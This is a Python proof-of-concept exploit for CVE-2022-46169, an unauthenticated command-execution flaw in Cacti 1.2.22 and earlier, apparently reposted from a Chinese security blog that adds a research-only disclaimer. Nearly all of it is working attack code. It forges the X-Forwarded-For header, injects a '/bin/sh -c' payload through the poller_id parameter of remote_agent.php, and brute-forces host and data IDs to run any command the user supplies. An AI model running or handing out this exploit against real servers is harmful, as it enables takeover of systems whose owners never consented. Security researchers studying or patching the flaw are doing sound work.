positional arguments:target URL of the Cacti application.optional arguments:-f FILE File containing the command-c CMD Command--n_host_ids The range of host_ids to try (0 - n)--n_local_data_ids The range of local_data_ids to try (0 - n)
import requestsimport argparseparser = argparse.ArgumentParser(prog='Poc for CVE-2022-46169',description='Exploit Unauthenticated RCE on Cacti <= 1.2.22',epilog='Author: saspect')parser.add_argument('target', help='URL of the Cacti application.')group = parser.add_mutually_exclusive_group(required=True)group.add_argument('-f', type=argparse.FileType(),help='File containing the command', dest='file')group.add_argument('-c', help='Command', dest='cmd')parser.add_argument('--n_host_ids', help='The range of host_ids to try (0 - n)', default=100, dest='n_ids', type=int)parser.add_argument('--n_local_data_ids', help='The range of local_data_ids to try (0 - n)', default=50, dest='n_localids', type=int)args = parser.parse_args()if args.file:# The '-f' argument is supplied, read the command from the filecmd = args.file.read().strip()elif args.cmd:# The '-c' argument is supplied, use it as the commandcmd = args.cmdelse:# No command was supplied, print an error messageparser.print_help()exit(1)payload = f'; /bin/sh -c "{cmd}"'local_data_ids = [x for x in range(0, args.n_localids)]target_ip = args.target.split("/")[2]print(f"[*] Trying for 1 - {args.n_ids} host ids")for id in range(args.n_ids):url = f'{args.target}/remote_agent.php'params = {'action': 'polldata', 'host_id': id,'poller_id': payload, 'local_data_ids[]': local_data_ids}headers = {'X-Forwarded-For': target_ip}r = requests.get(url, params=params, headers=headers)if('cmd.php' in r.text):print(f"[+] Exploit Completed for host_id = {id}")break
原文始发于微信公众号(Khan安全攻防实验室):CVE-2022-46169 的 PoC - Cacti <= 1.2.22 上未经身份验证的 RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论